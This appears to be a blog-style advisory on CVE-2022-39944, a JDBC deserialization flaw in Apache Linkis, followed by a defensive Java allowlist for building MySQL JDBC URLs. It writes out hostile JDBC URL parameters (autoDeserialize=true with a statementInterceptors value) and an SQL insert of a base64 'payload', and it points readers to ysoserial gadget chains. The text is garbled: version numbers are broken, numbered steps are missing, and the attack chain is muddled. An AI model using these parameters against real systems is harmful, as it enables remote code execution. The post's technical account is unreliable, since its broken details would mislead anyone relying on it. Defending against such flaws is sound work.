Published: 2024-06-24
Severity: High

Affected: Apache Linkis <= 1.2.

Apache Linkis is a powerful “computing middleware” often used in Big Data platforms to connect and manage different engines with a single interface. However, as with all complex systems, security is critical—especially when you connect to various data sources.

In 2022, a dangerous deserialization vulnerability was discovered in Linkis’s integration with the MySQL JDBC driver (Connector/J). It’s tracked as CVE-2022-39944 and can let an attacker who has write access to the target database perform *remote code execution* on the system.

This post will break down the issue, show how it happens, and offer guidance for both security researchers and system administrators.

What Is CVE-2022-39944?

In simple terms, Apache Linkis (up to version 1.2.) is vulnerable if it’s connected to a MySQL database using the MySQL Connector/J. When a user (or attacker) with the correct permissions sets up a JDBC Engine Connection (EC) and can write to the database, they can add *malicious parameters* into the JDBC URL. These can then trigger arbitrary code execution on the server Linkis runs on.

Put another way:
If the system trusts JDBC URL parameters without restrictions, attackers can smuggle in serialized Java payloads that get executed on your server.

- Apache Linkis installations ≤ 1.2.
- Using MySQL Connector/J for database access
- Attackers have access to configure JDBC data sources with custom URLs and have table write permissions

How the Attack Works

The root issue is old, insecure handling of user-provided parameters in JDBC URLs, especially with MySQL's auto-deserialization options. This can be abused by enabling an option like autoDeserialize=true and pointing the connection to a location (like a remote server) that hosts a dangerous serialized Java gadget chain.

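*In code*, setting up a connection might look like this:

```java
// Vulnerable pattern: the URL, including its driver options, comes from user-controlled configuration
String url = "jdbc:mysql://localhost:3306/db?autoDeserialize=true&userConfig=maliciousPayload";
Connection conn = DriverManager.getConnection(url, "user", "pass");
```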

If Linkis lets users set or influence these parameters, and the driver trusts them, deserialization of dangerous objects can happen.

A simplified attack chain

1. Attacker creates and uploads a malicious serialized Java object to a location accessible by the database.

```
jdbc:mysql://dbhost/dbname?autoDeserialize=true&userConfig=serialized_payload
```

3. The MySQL Connector/J driver, on connecting, deserializes the payload.
4. The payload executes arbitrary Java code—possibly opening a shell or dropping a webshell on the server.

Here's a very high-level *example* (for educational purposes only):

```sql
-- Insert a payload into a writable table in the DB
INSERT INTO victim_table (data) VALUES ('rOABXNyABFqYXZhLnVaWwuUHJpbnRTdHJlYWkSW5mbyIAAAAAAAA3BwAAeHIAFGphdmEubGFuZy5kaXNwYXRjaGVyLk9iczAAAAAAABIAAHhxAH4AAw==');
```

In Linkis, configure JDBC parameters to:

```
jdbc:mysql://dbhost/dbname?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor
```

The real payload would use a gadget chain, such as CommonsCollections, created using tools like ysoserial.

See the MySQL Connector/J security documentation and the ysoserial project for more background on Java deserialization attacks.

- The application passes user-controlled parameters into the JDBC URL.
- MySQL’s Connector/J before version 8..30 honors options like autoDeserialize=true.

References and More Reading

- Apache Linkis Security Advisories
- CVE-2022-39944 at NVD
- MySQL Connector/J Security Guide
- Deserialization Vulnerabilities Explained
- ysoserial (Java Deserialization Exploits)

Ensure only trusted users can set up or modify Engine Connections.

4. Use the latest MySQL Connector/J
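
One way to keep user input away from the driver options discussed above, shown as an added example (this is not Linkis's own patch or code from the original post): build the JDBC URL from validated parts and an exact-match allowlist instead of accepting a URL string. The class name `SafeMysqlUrl` and the contents of the allowlist are assumptions for illustration.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import java.util.Set;
import java.util.TreeMap;

public class SafeMysqlUrl {
    // Assumption: the only driver options this deployment lets users set.
    private static final Set<String> ALLOWED =
        Set.of("useSSL", "characterEncoding", "connectTimeout", "socketTimeout");

    // Build the URL from validated parts instead of accepting a user-supplied URL string.
    static String build(String host, int port, String db, Map<String, String> params) {
        if (!host.matches("[A-Za-z0-9.-]{1,253}")) throw new IllegalArgumentException("invalid host");
        if (port < 1 || port > 65535) throw new IllegalArgumentException("invalid port");
        if (!db.matches("[A-Za-z0-9_]{1,64}")) throw new IllegalArgumentException("invalid database name");

        StringBuilder url = new StringBuilder("jdbc:mysql://")
            .append(host).append(':').append(port).append('/').append(db);
        char sep = '?';
        for (Map.Entry<String, String> e : new TreeMap<>(params).entrySet()) {
            // Exact-match allowlist: unknown, re-cased or percent-encoded keys are all rejected.
            if (!ALLOWED.contains(e.getKey())) {
                throw new IllegalArgumentException("JDBC parameter not allowed: " + e.getKey());
            }
            url.append(sep).append(e.getKey()).append('=')
               .append(URLEncoder.encode(e.getValue(), StandardCharsets.UTF_8));
            sep = '&';
        }
        // Defence in depth: pin the risky driver switches off explicitly.
        return url.append(sep).append("autoDeserialize=false&allowLoadLocalInfile=false").toString();
    }

    public static void main(String[] args) {
        // Constructed sample input, not taken from a real deployment.
        System.out.println(build("dbhost", 3306, "dbname", Map.of("useSSL", "true")));
        try {
            build("dbhost", 3306, "dbname", Map.of("autoDeserialize", "true",
                "statementInterceptors", "com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor"));
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }
    }
}
```

An allowlist is used rather than a blocklist because a filter that only looks for known-bad names has to anticipate every spelling and encoding the driver will accept.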

Final Thoughts

The power of Apache Linkis comes with great responsibility—especially when linking complex data sources. CVE-2022-39944 is a perfect example: even a single unfiltered parameter in a JDBC URL can open the door to remote code execution.

If you use Apache Linkis and MySQL, patch now! And always review user-provided configuration, even if your system doesn’t seem to be directly exposed to the public internet.


For official updates and more info, check the Apache Linkis project home page and always follow your software vendor’s security mailing list.

Timeline

Published on: 10/26/2022 16:15:00 UTC
Last modified on: 10/28/2022 17:40:00 UTC